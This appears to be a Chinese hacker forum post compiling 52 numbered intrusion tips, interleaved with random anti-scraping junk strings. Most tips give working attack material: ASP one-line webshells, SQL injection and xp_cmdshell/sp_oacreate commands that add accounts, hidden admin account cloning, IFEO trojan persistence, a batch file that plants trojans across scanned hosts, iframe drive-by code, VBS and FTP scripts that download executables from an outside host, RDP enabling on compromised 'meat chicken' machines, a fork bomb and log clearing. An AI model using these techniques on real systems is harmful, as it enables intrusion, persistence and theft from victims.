Xp系统修改权限防止病毒或木马等破坏系统,cmd下,
: W- M# S8 z7 n2 M) Gcacls C:\windows\system32 /G hqw20:R
# [9 T) E0 _% u! i思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入
* @- B: d7 [* k1 M+ V" `恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F
& O0 {: {0 C9 @: A, Y2 P/ p' S0 n, C& ^% Z$ u5 y( @
2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。
2 P; T2 t# V8 H0 F. p. `& Z- T
/ [" k/ u- O/ a1 O3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。0 p* O' q. O$ R' s8 B# q3 q# u
9 o. z( a# R) \9 B& C
4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号) k B& [8 Q' m& L$ ^ ]
( q0 }8 `) x1 W
5、利用INF文件来修改注册表
* w' g0 @0 ~, E) O: N' X[Version]
* P4 u; o8 \! `: h& ]- J5 qSignature="$CHICAGO$"
6 @* Y9 L0 Z" k- G$ H9 m1 B; |" j) l! B# V[Defaultinstall]
/ T& t. i& a& UaddREG=Ating
. T, ~2 d& c' f9 h[Ating]2 R# H! m2 R4 j
HKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1" O z( h( d. }8 W9 w; t1 |+ \; x
以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:
/ R* Y$ _9 ^- p. Zrundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径7 l: b" ? c2 b; |' g7 o
其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU
+ n6 b6 O8 P) ], [HKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU
4 l$ D& a' M' P6 z' D4 P% D( [HKEY_CURRENT_CONFIG 简写为 HKCC2 o5 j' `+ t7 R7 I
0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值/ ~# Z, v: ^1 J) @* m$ J- L
"1"这里代表是写入或删除注册表键值中的具体数据
/ z, D+ [: P6 l2 q- D" ]" p; b7 `' g* ?: Z2 ~
6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,
! G6 i" T: U3 E! i& P6 a$ s多了一步就是在防火墙里添加个端口,然后导出其键值
) o7 P2 b5 J/ t$ D! K[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]1 l3 f& T. k# Q' K! c4 X! S% @
7 D8 @) k6 z' M0 n3 v1 v
7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽
) k, U1 n6 N! E, o P) S1 X在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。
3 `) \+ e$ P& m5 `) P1 l) E" k2 c9 N+ ^0 h( g N
8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。
" t" O2 L; e1 C' ~ B* ]' e
' b" A% l* z: g6 g7 C9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell," ^! z0 }% p% G* `+ Y: B3 B: S" z
可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。
% A1 V6 T2 S/ F+ Z& Z+ q# h2 a/ V) y0 z
10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”
# U3 L& i6 P8 Z( ?+ ]7 ?2 [+ v" X; U* L6 P( w
11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,
?. ]2 i9 c n8 I# q$ X( }用法:xsniff –pass –hide –log pass.txt6 |3 r9 Q6 _) L( w! F2 M
* h! l1 y8 s8 M" {4 K1 z+ q8 r) \12、google搜索的艺术; ]4 i( r6 W+ ~8 G; v) Q
搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”
: B% d; w* d' ]3 ^4 ^或“字符串的语法错误”可以找到很多sql注入漏洞。
" e6 }, f0 a; l- e; a* ?, J7 D7 F$ h* {6 N! r% J
13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。+ w/ w3 i( m$ r( K- A5 H& t
( O6 X& r' E* L( X$ `1 F, C# P. ?( R
14、cmd中输入 nc –vv –l –p 1987
8 V1 G0 b2 J; ~& N做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃
; q5 |6 H( b! D6 O
: H' F9 Q# {( M7 V4 R, w6 e15、制作T++木马,先写个ating.hta文件,内容为 ^( C) K" U5 c$ Y% w2 S. M
<script language="VBScript">
* d7 ^$ W8 e; x% v2 ?" U0 Tset wshshell=createobject ("wscript.shell" )
; u6 O0 o( l/ j6 h+ la=wshshell.run("你马的名称",1)
& |% x7 O& l |/ lwindow.close
/ H- u# ~! W6 }! B: X8 \8 D- Q/ x* X* V</script>
8 @: ^1 w7 L+ I2 M再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。
3 T4 F3 N+ G2 T6 k2 U/ o. ~3 P+ b) o& i
16、搜索栏里输入" M: s9 H0 u- Y
关键字%'and 1=1 and '%'='3 |5 H* c' j5 S
关键字%'and 1=2 and '%'='1 z9 P, C" ?; R1 f5 J
比较不同处 可以作为注入的特征字符# l: f' Y& [4 H, _+ P1 r* I
) Q3 Z3 W) r$ r: I; z/ e ?17、挂马代码<html>
( C8 x3 U. ^' T& e$ E' C<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>
; ?1 o1 g: F' M6 |9 h</html>
- n0 O/ W! L2 y9 t7 f" A; b
" ^0 M, O, R, B( ^! i18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,# \+ C( Z2 S& c0 C
net localgroup administrators还是可以看出Guest是管理员来。
: T( o4 G# H2 \. q% u
5 A0 e) i& [0 C6 f/ e' F19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等
: J& x4 O# x+ y+ E) d$ B用法: 安装: instsrv.exe 服务名称 路径
: ^5 `* a8 f& @: y( `卸载: instsrv.exe 服务名称 REMOVE/ ^5 \( ]9 B! P( ?
7 m; `2 B' o2 r
- f$ d8 m$ e) D: M9 Y21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉" X) o$ B$ ~$ j. m* Z" \
不能注入时要第一时间想到%5c暴库。
2 e+ P' _, |, @( f2 |$ e, Z4 o3 j
22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~# w) |# r) R8 d' r
/ V2 c/ u3 ~1 `8 P23、缺少xp_cmdshell时$ `4 u1 z) G ]. A1 |- i
尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
% h* U0 N7 k& z, x$ h l& L假如恢复不成功,可以尝试直接加用户(针对开3389的)
1 K+ z' P `. i' sdeclare @o int% C$ E; o6 v/ t V- p& ]8 C
exec sp_oacreate 'wscript.shell',@o out& t! i. ]$ w. ^% f! b6 A
exec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员' p. _" Z/ e: p& d0 F# j. b
' X" Z( n3 F, S$ a+ Z, l# J24.批量种植木马.bat7 I- J ^; z! _! p, N( X' O0 L9 m/ b
for /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中
. Q' a, M, [& K5 w& X- ~& X, Sfor /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间8 ]1 M0 P+ ^" \5 ?1 i4 t
扫描地址.txt里每个主机名一行 用\\开头
2 n$ r5 h& E7 {0 T6 F8 ?3 l1 |4 f% E$ Q% M% j
25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。* e. I' J: B7 q
5 w; t% a$ _+ n W! ] q26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.3 {9 I" \9 |6 y9 K4 ?: y
将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.& J- }" D( W$ ^/ {8 n5 f
.cer 等后缀的文件夹下都可以运行任何后缀的asp木马9 s. R, A, `, P" d; {
* f. t9 f- }" X4 D( H Q
27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP
8 v! j$ D6 J. P, c6 N& z然后用#clear logg和#clear line vty *删除日志9 U6 r3 K- w2 U" O/ M: r9 N, j- t
1 z$ O- O, E4 s* K! g
28、电脑坏了省去重新安装系统的方法( Y4 V( w, g2 [6 I% s v: }; S
纯dos下执行,/ V9 R: B2 p- i" t% v) B
xp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config
" V2 Y' j4 I, E! I" D* x- o% R2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config
4 f7 y# i* z: |4 h C6 M/ E2 r" l! o- V! |0 U
29、解决TCP/IP筛选 在注册表里有三处,分别是:4 ]8 `1 U( Z, M- W8 ^1 Y
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip' O; I/ |; t; H9 t- N5 p# ~4 L
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
5 M( H# ^! q2 w7 iHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
. g$ o9 F% e" d2 K8 }; U分别用: M8 ^) o0 ^- G; R a
regedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
9 |& W+ H0 M1 K' p6 z- D2 N6 bregedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
) j( L% i: L8 T8 o% D( Lregedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip, H7 k# k, _2 j) B6 n) Y
命令来导出注册表项! b) a% ?) [* s7 O9 n' I$ u
然后把三个文件里的EnableSecurityFilters"=dword:00000001,
& t4 [; v" M( y1 I9 q$ n* O3 C改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用) @/ C# J% u* Y/ d+ P) ?$ v5 V- c
regedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。
7 k3 i$ Y7 @' f$ n
! t I Q% w% z4 y; X" Y30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U
+ Q1 t- j, `# n6 f9 k' q! MSER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的33 h' x. s2 U0 s1 a9 U. ?8 T6 i
4 }8 Y8 o# E- V. C31、全手工打造开3389工具
% w% C: `" M$ U# `' V `打开记事本,编辑内容如下:
5 G- \1 B/ W: g4 ]% c" l: zecho [Components] > c:\sql5 }( h1 g( Z% V+ \! Z
echo TSEnable = on >> c:\sql
- A* i; M) H9 e! Tsysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q
9 z' g! j- [. ]: {0 }编辑好后存为BAT文件,上传至肉鸡,执行
9 _8 ?( O) t; X* ^$ k8 s. j: J- E5 C
32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马. Y7 b, P- [1 h" W. a* ?
\( E; R- ?) i; B7 j1 h; T33、让服务器重启# y0 }- \# k* j- l
写个bat死循环:) A- f Y0 b F2 H
@echo off
( W7 u0 ^- B- {:loop1' i3 X1 l6 }# G0 V) T
cls3 N! x# U8 T5 K0 v
start cmd.exe
! D: z2 h5 a: {' J- b8 bgoto loop1
; s( n1 F/ |3 Z9 t/ _2 y+ g保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启" l. P, E% O/ i! e# U; c. K
/ T/ \' T. \3 r6 k! V
34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,
8 K% u/ j$ ~" F" Q) E% E; U3 {2 j@echo off# N3 i$ [/ J0 A0 f$ k4 b
date /t >c:/3389.txt( L3 W' G7 k% V) t3 k2 G
time /t >>c:/3389.txt( I) U- e B" r# ]/ ?- a: {6 e+ Y. N
attrib +s +h c:/3389.bat
' H- @! G/ n2 k: o9 h9 F/ q2 Sattrib +s +h c:/3389.txt3 P+ {5 B% b1 v0 |$ m7 h
netstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt
% A0 w; @) x1 S并保存为3389.bat; {0 W0 o: I% R4 f
打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号5 V7 W+ X, @( r3 w
- j0 ?. ~% t9 \ e
35、有时候提不了权限的话,试试这个命令,在命令行里输入:0 @2 K$ z3 V) V' E
start http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页)
& u. d* f( D; h0 _输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。6 I, h+ H/ ^( h! e+ [
2 ]6 W9 K" y& A5 Y' l3 K# b# Q, F36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件
& g% T% O" W9 q' `echo open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址. r; I9 A1 B6 S- x. b. x7 Y
echo 你的FTP账号 >>c:\1.bat //输入账号" a; F' z, t! q- z
echo 你的FTP密码 >>c:\1.bat //输入密码% B) h# D' r% J# g" I8 e9 Z
echo bin >>c:\1.bat //登入" p l7 w, Z# r
echo get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么( O7 @: ]) _1 Z; L2 n, u/ E M
echo bye >>c:\1.bat //退出' _% e. }: u6 v1 d- Y( |
然后执行ftp -s:c:\1.bat即可
, \7 V$ h. w3 l. M9 H7 D3 t' f/ {( W; i
37、修改注册表开3389两法3 \% l4 @9 x, x/ D9 ]6 h2 {
(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表
+ X, w) [" N+ yecho Windows Registry Editor Version 5.00 >>3389.reg
- U4 e, k8 {5 P; i2 j( ~5 u* becho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg7 K* @' T% [$ q `1 w) Y* p" ~
echo "Enabled"="0" >>3389.reg
' J0 Y6 Q$ N/ `! Y: j; vecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows0 y9 b% }* x# ^4 O
NT\CurrentVersion\Winlogon] >>3389.reg1 _! c0 O* N N- {1 ]
echo "ShutdownWithoutLogon"="0" >>3389.reg
w! L( X4 f- i$ p3 {8 Q: K/ a8 S# Mecho [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]7 y( m& x# L+ e5 k
>>3389.reg) @" k2 v% {( `2 `. S7 ?
echo "EnableAdminTSRemote"=dword:00000001 >>3389.reg
5 f3 p+ B; b) R) w k& v" ?6 Techo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
" _2 M7 }7 x' k k: L6 Q* C>>3389.reg: j) i# Q) D- m c! C
echo "TSEnabled"=dword:00000001 >>3389.reg& {9 y7 u! U5 u) a3 J8 L# o% M5 ?
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg1 ?! s) D. r7 _' g
echo "Start"=dword:00000002 >>3389.reg
4 y) C* M! X/ R8 e/ y2 o$ \echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]
: n- I1 c: p: d* V3 Y: W" K>>3389.reg$ x/ I: {4 B; S+ U6 {' f
echo "Start"=dword:00000002 >>3389.reg, t7 p, G) ^$ X& V* i# g& p
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg7 m) ]3 E% T2 h
echo "Hotkey"="1" >>3389.reg8 F" T5 ^; Q: N% P6 R, _2 N ^
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal8 W4 ]9 E. Y' n( z1 w
Server\Wds\rdpwd\Tds\tcp] >>3389.reg
! p* _* i) K4 }/ ~5 ^ X+ ]( techo "PortNumber"=dword:00000D3D >>3389.reg
& n# q8 t) h2 K" j3 q* |echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal* e& L9 \& P$ H$ P" Y' P
Server\WinStations\RDP-Tcp] >>3389.reg4 l3 G% t4 \# A7 h2 p# R7 S2 _
echo "PortNumber"=dword:00000D3D >>3389.reg
0 A* p& ~) ~( h0 ^3 p t# w把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。
+ S u6 z, }0 X, |- i1 J- W3 @8 j(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)
$ J& r6 z0 G$ o V: `+ o0 T因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效7 o5 K0 F7 K" g# s
(2)winxp和win2003终端开启1 r& k7 X$ M8 E, \
用以下ECHO代码写一个REG文件:& e! Q( N2 ]# a% y
echo Windows Registry Editor Version 5.00>>3389.reg' D: u+ B$ m' @( H; r
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
I- A5 ]& d0 k1 U. BServer]>>3389.reg& b0 W# f$ K+ j& |1 b1 u% e3 M6 w, M- v
echo "fDenyTSConnections"=dword:00000000>>3389.reg
1 p6 _# v3 c X q# fecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
8 b2 n/ Z- m/ }; \) d- [Server\Wds\rdpwd\Tds\tcp]>>3389.reg
8 b5 _ P u% O! Secho "PortNumber"=dword:00000d3d>>3389.reg# P4 _' ]3 y& ~
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
, h: M% L+ ^5 n) y" u7 lServer\WinStations\RDP-Tcp]>>3389.reg
- {8 |" @; |9 G; g% V& Z, t- Yecho "PortNumber"=dword:00000d3d>>3389.reg
4 Y: s7 A3 R$ ^* v. l1 b3 i' R然后regedit /s 3389.reg del 3389.reg
& S S1 K& q$ N* i8 A7 dXP下不论开终端还是改终端端口都不需重启. G! N s( z. ~. k) f% ~
F* E# v8 g7 m3 c38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃
5 w& e7 W s$ w0 T用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'* t( V# h# w {2 T6 {8 G7 J3 J
9 R" f# \0 I, a+ K. o8 P* W8 L39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!9 T$ W: V/ ~1 x: @- z, v
(1)数据库文件名应复杂并要有特殊字符% A) g7 Z, T- b" j, X* }
(2)不要把数据库名称写在conn.asp里,要用ODBC数据源! y% L1 d/ b) v. F& R, v
将conn.asp文档中的& Z! u1 S, g! H
DBPath = Server.MapPath("数据库.mdb"). ^4 Y0 W' N# [1 a, n
conn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath
$ n1 D3 ]4 U2 n1 B
; q L9 \3 R* z修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置
% b g# p& `- x, X: S5 _(3)不放在WEB目录里5 N# K6 d& E2 F# Q- d I& `
0 @9 |, R" I8 Q% s
40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉
& |% Y/ R* K2 U/ j可以写两个bat文件( f6 b% [9 |* O# O* u# A9 g
@echo off5 G# W0 `+ @% W/ Y
@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe7 r! |3 A; A! N W# O
@del c:\winnt\system32\query.exe d+ Q9 j. B, ^7 K, E `* e
@del %SYSTEMROOT%\system32\dllcache\query.exe
4 C" D; @. l5 g* p7 g0 X@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的
% o! A& R5 V' R3 p4 @" e# }0 G0 ~3 A
! _& X/ U! K# w7 C: i( K@echo off% O* `7 B* T; W) u/ R4 L
@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe
3 A4 J$ I, K5 {( E@del c:\winnt\system32\tsadmin.exe7 s+ t, e S' e. L
@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex8 K- K& W7 n6 P7 b' T
& h" w: |4 H# f/ d( o8 M8 G
41、映射对方盘符
+ B0 m0 h% [) a0 s# ftelnet到他的机器上,
4 U5 c$ @; t5 t. onet share 查看有没有默认共享 如果没有,那么就接着运行
7 y- U1 _/ H2 n, b0 t$ @" J. T" anet share c$=c:* ]$ b K* U I; H) g; r, g$ ?
net share现在有c$
: p( F7 ], J# U: J8 F& X$ t: D* Z在自己的机器上运行' S4 T8 N/ @3 L% |8 Z, i7 X
net use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K/ O4 D7 G ~8 X' s5 ^, ~
+ V8 ]1 H& L' A% a42、一些很有用的老知识$ V- @2 K$ [! U
type c:\boot.ini ( 查看系统版本 )
* O6 ]6 t0 N' ~* ] anet start (查看已经启动的服务)% V! x1 ?% L4 D# }0 S0 Z, e
query user ( 查看当前终端连接 )7 J* k" c. \9 v: S+ F
net user ( 查看当前用户 )
1 T4 Q u" V1 d0 ]net user 用户 密码/add ( 建立账号 )
~# |* o; p$ `' H. i; P2 r- Y3 Bnet localgroup administrators 用户 /add (提升某用户为管理员)( k W5 m( L4 ?$ j3 y0 Q/ K! C
ipconfig -all ( 查看IP什么的 )
$ L p3 L/ ]. D1 L) @' I) Rnetstat -an ( 查看当前网络状态 )
- C0 { _6 k4 O5 B6 E% s7 _findpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)! V# F! M5 K" J: q6 G+ B0 V
克隆时Administrator对应1F4
* o" q! t" g! m* ^7 B+ Y1 Kguest对应1F59 z; U" k9 x/ G' q7 L
tsinternetuser对应3E8
- \ U+ x0 |2 u
4 }' I. P/ u0 A! {/ w |43、如果对方没开3389,但是装了Remote Administrator Service
' B* Y8 j @' Z- o" h用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接% X/ C$ C% S1 _) R7 B, D/ {3 N/ @1 d
解释:用serv-u漏洞导入自己配制好的radmin的注册表信息8 Q. ]1 C: m( `3 a: v7 i+ X
先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"
4 C) ~2 }( C. H# B1 |1 d! B' t4 [* N. A1 m
44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定), Q3 |/ u# \ h" K- O
本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)
: L x, x9 ?( f; C) {6 D6 ?: q& q" k! F/ c
45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入)
& k& z0 b5 l' ~echo Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open
8 ]* H5 t3 ^ I6 O4 P^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =
5 P, ?+ [) N# t* oCreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =
& [! C" h7 W& S' B/ Z1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs2 X9 _# a& ^- O2 {# C6 a
(这是完整的一句话,其中没有换行符)
1 x$ S+ z0 v9 d' M9 q" T然后下载:
+ C* k4 A# x9 Lcscript down.vbs http://www.hack520.org/hack.exe hack.exe
9 ~# y3 ]9 _0 W+ Y/ j7 X
# M% h! j$ X; u# a, T46、一句话木马成功依赖于两个条件:; Y- y4 S. `: x, x+ }
1、服务端没有禁止adodb.Stream或FSO组件
& E4 b% x5 ?' t5 c2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。- |+ K" Z; a" V' A" {
" ~/ t* r5 b, A3 |" F
47、利用DB_OWNER权限进行手工备份一句话木马的代码:3 ~0 p7 n; K/ e6 ^1 z! m
;alter database utsz set RECOVERY FULL--
! o; V1 m% N/ k3 x3 t7 _;create table cmd (a image)--; n3 v/ t9 W4 K9 u7 n
;backup log utsz to disk = 'D:\cmd' with init--! V, Y' t b& C/ ^2 d
;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--
5 e# S6 q6 ?6 x;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--
* V0 ^ a% i- D( A% \2 }& r9 ^注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。, Z# u# M. S0 e# B M! a; t
+ K! R! a' n) m' X% p4 q
48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:
- i- Y5 M# k3 q+ ` E
+ I7 i4 s& V6 _" B2 w& b- z) f用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options* V2 {& e# v+ f$ ?, l
所有会话用 'all'。! O( j1 u+ ?4 V% G1 C" @
-s sessionid 列出会话的信息。
- ^, i/ Q8 l2 W% ~' a" Z" M2 w-k sessionid 终止会话。6 ?- {9 j$ Z- z! f1 {* F9 p0 g
-m sessionid 发送消息到会话。
) o V3 `" F8 Z. X. y( u' W
5 x* d) I) m/ Q) uconfig 配置 telnet 服务器参数。
) J# a9 U7 F" q
2 k# B; O( U2 Rcommon_options 为:
- Y+ _9 L7 i9 N, o-u user 指定要使用其凭据的用户
5 n+ L( d9 B1 s' V0 \0 Y-p password 用户密码
H" _9 V8 Q+ H- e/ j0 F1 |: T, y5 F) v% G0 N
config_options 为:3 a& d4 s; I/ g/ b2 _
dom = domain 设定用户的默认域
# s! L3 r. {( S. t/ Nctrlakeymap = yes|no 设定 ALT 键的映射
, Z- j( Q& K+ k: d* ^; [timeout = hh:mm:ss 设定空闲会话超时值
+ |; ]" [7 j0 Z0 C; V/ t* jtimeoutactive = yes|no 启用空闲会话。# e$ L8 V4 A1 t# ^) D
maxfail = attempts 设定断开前失败的登录企图数。
. j1 t$ S, [8 Imaxconn = connections 设定最大连接数。4 l# e, I7 L% l8 t u7 j, ~' u1 A
port = number 设定 telnet 端口。
" k: N* R9 l$ Q. f: h) \sec = [+/-]NTLM [+/-]passwd
- z! b- Q$ A& k! C! h: Z6 G设定身份验证机构3 ?' z: e& C* X) ?
fname = file 指定审计文件名。5 O4 O# j' x: R: S% c/ H5 v: x* C4 W
fsize = size 指定审计文件的最大尺寸(MB)。
9 h) m& A7 e. f6 H4 ?0 d" mmode = console|stream 指定操作模式。
) A+ M* ~7 N* zauditlocation = eventlog|file|both5 l3 D' {' g5 @; [3 T& k1 d' K
指定记录地点 |9 R! R! m- H, C* t9 c
audit = [+/-]user [+/-]fail [+/-]admin
9 e+ P" D; i7 Y) U* b. w* C, C9 W& t+ _
49、例如:在IE上访问:
. l' Z7 A! d3 v6 s9 N2 K, Mwww.hack520.org/hack.txt就会跳转到http://www.hack520.org/
3 D5 X C* h4 j9 ^5 u O0 E* |hack.txt里面的代码是:& u* f* T+ \% L9 j
<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">9 \5 c7 j3 U2 I0 h2 K
把这个hack.txt发到你空间就可以了!$ W3 i" V# l2 m5 g) t
这个可以利用来做网马哦!
2 f; r. q# g- b5 m9 l& |# m- V; f0 _) x2 d! t; X; B, h, g
50、autorun的病毒可以通过手动限制!
: U) f3 {3 @1 C1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!1 I! i& I) y+ @4 N) Y
2,打开盘符用右键打开!切忌双击盘符~
5 c* O6 @! J) t1 a& X# a( l/ L3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!) Y* o; Z" }% Z" h& K9 t5 x2 k
$ ] |2 ]( B4 C51、log备份时的一句话木马:/ Z1 _' X: u+ Q$ b6 V
a).<%%25Execute(request("go"))%%25>1 g+ A4 y( l# B3 }/ S2 r) v& [
b).<%Execute(request("go"))%>4 G, _; ~7 o, t
c).%><%execute request("go")%><%" |" O. b% I$ |) T3 ]6 N8 v0 Y# v
d).<script language=VBScript runat=server>execute request("sb")</Script>
/ ^1 }9 ?& d# Z' X8 Q4 ve).<%25Execute(request("l"))%25>0 Z3 m: _5 w- A9 A- G. H9 X
f).<%if request("cmd")<>"" then execute request("pass")%>
/ L# F- d- x: R) e# R! |; H) a6 ?3 Z1 i2 K% Q- i
52、at "12:17" /interactive cmd
7 c# h1 }+ `( E, Z6 h执行后可以用AT命令查看新加的任务
" G! I( Q; _: c: T用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。, M& O8 k* K1 c' P: G8 }; T$ u
